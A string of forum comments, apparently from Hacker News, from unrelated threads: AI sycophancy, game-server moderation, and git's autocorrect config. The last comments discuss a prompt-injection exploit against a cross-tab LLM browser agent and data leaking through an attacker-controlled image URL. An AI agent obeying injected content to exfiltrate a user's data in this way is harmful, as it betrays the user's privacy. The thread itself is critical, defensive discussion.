Edit: just realized the irony but it's really a good question lol
Never forget what AI stole from us. This used to be a compliment, a genuine appreciation of a good question well-asked. Now it's tainted with the slimy, servile, sycophantic stink of AI chat models.
If its a server with admins I can contact them on discord and get them banned pretty quickly. As a system it worked pretty well, had some badmins but there was plenty of servers so could just join another. Though its not really compatible with the matchmaking style games we have today.
1. How many active Apex/whatever games there are at any one time 2. How many users will just report anyone they die to as a cheater
That being said, there are obviously cases where you mistype (usually a fat-finger or something, where you don't physically recognise that you've pressed multiple keys) and don't appreciate it until you visually notice it or the application doesn't do what you expected. 100ms to react to an unexpected stimulus like that is obviously not useful.
EDIT: 1) is the result of my misreading of the article, the "previous value" never existed in git.
1) Pushing a change that silently break by reinterpreting a previous configuration value (1=true) as a different value (1=0.100ms confirmation delay) should pretty much always be avoided. Obviously you'd want to clear old values if they existed (maybe this did happen? it's unclear to me), but you also probably want to rename the configuration label..
2) Having `help.autocorrect`'s configuration argument be a time, measured in a non-standard (for most users) unit, is just plainly bad. Give me a boolean to enable, and a decimal to control the confirmation time.
LLM within a browser that can view data across tabs is the ultimate “lethal trifecta”.
Earlier discussion: https://news.ycombinator.com/item?id=44847933
It’s interesting that in Brave’s post describing this exploit, they didn’t reach the fundamental conclusion this is a bad idea: https://brave.com/blog/comet-prompt-injection/
Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough. The only good mitigation they mention is that the agent should drop privileges, but it’s just as easy to hit an attacker controlled image url to leak data as it is to send an email.
Maybe I have a fundamental misunderstanding, but I feel like hoping that model alignment and in-model guardrails are statistical preventions, ie you'll reduce the odds to some number of zeroes preceeding the 1. These things should literally never be able to happen, though. It's a fools errand to hope that you'll get to a model where there is no value in the input space that maps to <bad thing you really don't want>. Even if you "stack" models, having a safety-check model act on the output of your larger model, you're still just multiplying odds.